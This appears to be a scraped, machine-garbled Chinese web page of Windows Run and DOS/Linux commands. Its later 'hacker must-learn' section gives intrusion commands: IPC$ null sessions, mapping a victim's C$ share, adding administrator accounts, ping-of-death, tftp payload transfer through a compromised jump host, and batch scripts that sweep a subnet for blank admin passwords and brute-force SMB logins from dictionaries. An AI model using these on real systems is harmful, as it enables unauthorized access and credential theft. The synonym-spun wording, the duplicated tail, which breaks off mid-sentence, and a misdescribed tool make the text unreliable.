phpcli弹出dos窗口技巧_开始→运行→敕令以及dos敕令的运用

打算机运行命令可以帮我们快速打开我们须要的设置界面，方便对电脑进行掩护设置。

\+IP 链接局域网打算机

\\+打算机名称 同样 链接局域网打算机。

定时关机

命令：at 21:00 ShutDown –S –T30

该命令运行后，到了21:00点，电脑会涌现“系统关机”对话框，并默认30秒延时自动关机。

定时提醒

命令：at 12:00 Net Send 10.10.36

.122与朋友约会的韶光到了，快点准备出发吧!

个中Net Send是Windows内部程序，可以发送到网络上的其他用户、打算机。
10.10.36.122是本机电脑的IP地址。
这个功能在Windows中也称作“信使做事”。

自动运行批处理文件

如果公司的数据佷主要，哀求在指定的日期/韶光进行备份，那么运行：

命令：at 1:00AM /Every:Saturday My_BackUp.bat

这样，在每个Saturday（周六）的早上1:00点，电脑定时启动My_BackUp.bat批处理文件。
My_BackUp.bat是一个你自行体例的批处理文件，它包含能对系统进行数据完备备份的多条命令。

取消已经安排的操持

命令：at 5 /Delete

有时候，你已经安排好的操持可能临时变动，这样你可以及时地用上述命令删除该操持（5为指派给已操持命令的标识编号），当然，删除该操持后，可以重新安排。

命令大全

winver---------检讨Windows版本

wmimgmt.msc----打开windows管理体系构造(WMI)

wupdmgr--------windows更新程序

wscript--------windows脚本宿主设置

write----------写字板

winmsd---------系统信息

wiaacmgr-------扫描仪和摄影机引导

winchat--------XP自带局域网谈天

mem.exe--------显示内存利用情形

Msconfig.exe---系统配置实用程序

mplayer2-------大略单纯widnows media player

mspaint--------画图板

mstsc----------远程桌面连接

mplayer2-------媒体播放机

magnify--------放大镜实用程序

mmc------------打开掌握台

mobsync--------同步命令

dxdiag---------检讨DirectX信息

drwtsn32------ 系统年夜夫

devmgmt.msc--- 设备管理器

dfrg.msc-------磁盘碎片整理程序

diskmgmt.msc---磁盘管理实用程序

dcomcnfg-------打开系统组件做事

ddeshare-------打开DDE共享设置

dvdplay--------DVD播放器

net stop messenger-----停滞信使做事

net start messenger----开始信使做事

notepad--------打开记事本

nslookup-------网络管理的工具引导

ntbackup-------系统备份和还原

narrator-------屏幕“讲述人”

ntmsmgr.msc----移动存储管理器

ntmsoprq.msc---移动存储管理员操作要求

netstat -an----(TC)命令检讨接口

syncapp--------创建一个公函包

sysedit--------系统配置编辑器

sigverif-------文件署名验证程序

sndrec32-------录音机

shrpubw--------创建共享文件夹

secpol.msc-----本地安全策略

syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码

services.msc---本地做事设置

Sndvol32-------音量掌握程序

sfc.exe--------系统文件检讨器

sfc /scannow---windows文件保护

tsshutdn-------60秒倒计时关机命令

tourstart------xp简介（安装完成后涌现的漫游xp程序）

taskmgr--------任务管理器

eventvwr-------事宜查看器

eudcedit-------造字程序

explorer-------打开资源管理器

packager-------工具包装程序

perfmon.msc----打算机性能监测程序

progman--------程序管理器

regedit.exe----注册表

rsop.msc-------组策略结果集

regedt32-------注册表编辑器

rononce -p ----15秒关机

regsvr32 /u .dll----停滞dll文件运行

regsvr32 /u zipfldr.dll------取消ZIP支持

cmd.exe--------CMD命令提示符

chkdsk.exe-----Chkdsk磁盘检讨

certmgr.msc----证书管理实用程序

calc-----------启动打算器

charmap--------启动字符映射表

cliconfg-------SQL SERVER 客户端网络实用程序

Clipbrd--------剪贴板查看器

conf-----------启动netmeeting

compmgmt.msc---打算机管理

cleanmgr-------垃圾整理

ciadv.msc------索引做事程序

osk------------打开屏幕键盘

odbcad32-------ODBC数据源管理器

oobe/msoobe /a----检讨XP是否激活

lusrmgr.msc----本机用户和组

logoff---------注销命令

iexpress-------木马捆绑工具，系统自带

Nslookup-------IP地址侦测器

fsmgmt.msc-----共享文件夹管理器

utilman--------赞助工具管理器

gpedit.msc-----组策略

下来我们看

DOS命令的利用

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接上岸后映射对方C：到本地为

H:

net use h: \\ip\c$ 上岸后映射对方C：到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名　密码　/add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其

具有管理员权限,把稳：administrator后加s用复数

net start 查看开启了哪些做事

net start 做事名　 开启做事；(如:net start telnet， net start schedule)

黑客必学dos命令2

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]

数据包大小”；“-n发送数据次数”；“-t”指一贯ping。

ping -t -l 65550 ip 去世亡之ping(发送大于64K的文件并一贯ping就成了去世亡之

ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，

ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装

目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后逼迫结束某进程(为系统的附加工具，默认是没有安

装的，在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除

只读、隐蔽、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐蔽

、系统、存档以外的文件。
例如“DEL/AR .”表示删除当前目录下所有只读文

件，“DEL/A-S .”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\. 复制对方admini$共享

下的srv.exe文件（所有文件）至本地C：

xcopy 要复制的文件或目录树　目标地址\目录名

复制文件和目录树，用参数/Y

将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe

上岸后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二

进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模

式）进行传送

tftp -i 对方IP　put c:\server.exe 上岸后，上传本地c:\server.exe至主机

ftp ip 端口

用于上传文件至做事器或进行文件操作，默认端口为21。
bin指用二

进制办法传送（可实行文件进）；默认为ASCII格式传送(文本文件时)

route print 显示出IP路由，将紧张显示网络地址Network addres，子网掩码

Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，卖力把一个IP解析成一个物理

性的MAC地址。
arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程

序或命令

mem 查看cpu利用情形

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的

存档，只读

，系统，隐蔽 属性；用＋则是添加为某属性

dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时

间，/T:A显示文件上次被访问韶光，/T:W上次被修正韶光

date /t 、 time /t 利用此参数即“DATE/T”、“TIME/T”将只显示当前日期和

韶光，而不必输入新日期和韶光

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 停息批处理程序，并显示出：请按任意键连续....

if 在批处理程序中实行条件处理（更多解释见if命令及变量）

goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以

冒号打头，例如：“：start”标签）

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多解释见

call /?）

for 对一组文件中的每一个文件实行某个特定命令（更多解释见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中

findstr

find 文件名

查找某文件

title 标题名字

变动CMD窗口标题名字

color 颜色值

设置cmd掌握台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿

、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、

D=淡紫、E=淡黄、F=亮白

prompt 名称

变动cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

print 文件名

打印文本文件

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、打算机名

）

format 盘符 /FS:类型

格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D:

/FS:NTFS

md　目录名

创建目录

replace 源文件　要更换文件的目录

更换文件

ren 原文件名　新文件名

重命名文件名

tree 以树形构造显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名

显示文本文件的内容

more 文件名

逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为DOS供应的锁定命令(编辑命令行，重新调用win2k命令，

并创建宏)。
如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；

解锁：doskey dir=

regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名 导出注册表

cacls 文件名　参数 显示或修正文件访问掌握列表（ACL）——针对NTFS格式时

。
参数：/D 用户名:设定谢绝某用户访问；/P 用户名erm 更换指定用户的访问

权限；/G 用户名erm 授予指定用户访问权限；Perm 可以是: N 无，R 读取，

W 写入， C 变动(写入)，F 完备掌握；例：cacls D:\test.txt /D pub 设定

d:\test.txt谢绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加表明

netsh 查看或变动本地网络配置情形

"Hello" aa.txt 在aa.txt文件中探求字符串hello

show tables; 显示库中的数据表

describe 表名; 显示数据表的构造

create database 库名; 建库

use 库名；

create table 表名 (字段设定列表)； 建表

drop database 库名;

drop table 表名； 删库和删表

delete from 表名; 将表中记录清空

select from 表名; 显示表中的记录

date 现在的日期、韶光

who 查询目前和你利用同一台机器的人以及Login韶光地点

w 查询目前上机者的详细资料

whoami 查看自己的帐号名称

groups 查看某人的Group

passwd 变动密码

history 查看自己下过的命令

ps 显示进程状态

kill 停滞某进程

gcc 黑客常日用它来编译C措辞写的文件

su 权限转换为指定利用者

telnet IP telnet连接对方主机（同win2K），当涌现bash$时就解释连接成功。

ftp ftp连接上某做事器（同win2K）

附：批处理命令与变量

1：for命令及变量 基本格式：

FOR /参数 %variable IN (set) DO command [command_parameters] %variable:

指定一个单一字母可更换的参数，如：%i ，而指定一个变量则用：%%i ，而调用

变量时用：%i% ，变量是区分大小写的（%i 不即是 %I）。

批处理每次能处理的变量从%0—%9共10个，个中%0默认给批处理文件名利用，%1

默认为利用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例

：net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件，可利用通配符，如：(D:\user.txt)和(1 1 254)(1

-1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"

指结束值，即：从1到254；“(1 -1 254)”解释：即从254到1}

command：指定对第个文件实行的命令，如：net use命令；如要实行多个命令时

，命令这间加：& 来隔开

command_parameters：为特定命令指定参数或命令行开关

IN (set)：指在(set)中取值；DO command ：指实行command

参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取

完为止{(set)为文件时，如(d:\pass.txt)时}。

用法举例：

@echo off

echo 用法格式：test.bat .. > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G

/user:administrator | find "命令成功完成" >>test.txt

存为test.bat 解释：对指定的一个C类网段的254个IP依次试建立administrator

密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：..为批处理默认

的 %1；%%G 为变量(ip的末了一位）；& 用来隔开echo 和net use 这二个命令；

| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为

完全的IP地址；(1 1 254) 指起始值，增长量，结止值。

@echo off

echo 用法格式：ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存为：ok.exe 解释：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic

中的用户密码，直到文件中值取完为止。
%%i为用户名；%1为输入的IP地址（默认

）。

mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的\\mysql\\bin

目录下实行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个

文本文件，文件名任取，打开看看你会有新创造。

win2003系统下新增命令（实用部份）：

shutdown /参数 关闭或重启本地或远程主机。

参数解释：/S 关闭主机，/R 重启主机， /T 数字 设定延时的韶光，范围0～180

秒之间， /A取消开机，/M //IP 指定的远程主机。

例：shutdown /r /t 0 立即重启本地主机（无延时）

taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

参数解释：/PID 要终止进程的pid,可用tasklist命令得到各进程的pid，/IM 要

终止的进程的进程名，/F 逼迫终止进程，/T 终止指定的进程及他所启动的子进

程。

tasklist 显示当前运行在本地和远程主机上的进程、做事、做事各进程的进程标

识符(PID)。

参数解释：/M 列出当提高程加载的dll文件，/SVC 显示出每个进程对应的做事，

无参数时就只列出当前的进程。

Linux系统下基本命令： 要区分大小写

uname 显示版本信息（同win2K的 ver）

dir 显示当前目录文件,ls -al 显示包括隐蔽文件（同win2K的 dir）

pwd 查询当前所在的目录位置

echo 用法格式：test.bat .. > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G

/user:administrator | find "命令成功完成" >>test.txt

存为test.bat 解释：对指定的一个C类网段的254个IP依次试建立administrator

密码为空的IPC$连接，如果成功就把该IP存在test.txt中。

/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：..为批处理默认

的 %1；%%G 为变量(ip的末了一位）；& 用来隔开echo 和net use 这二个命令；

| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为

完全的IP地址；(1 1 254) 指起始值，增长量，结止值。

@echo off

echo 用法格式：ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存为：ok.exe 解释：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic

中的用户密码，直到文件中值取完为止。
%%i为用户名；%1为输入的IP地址（默认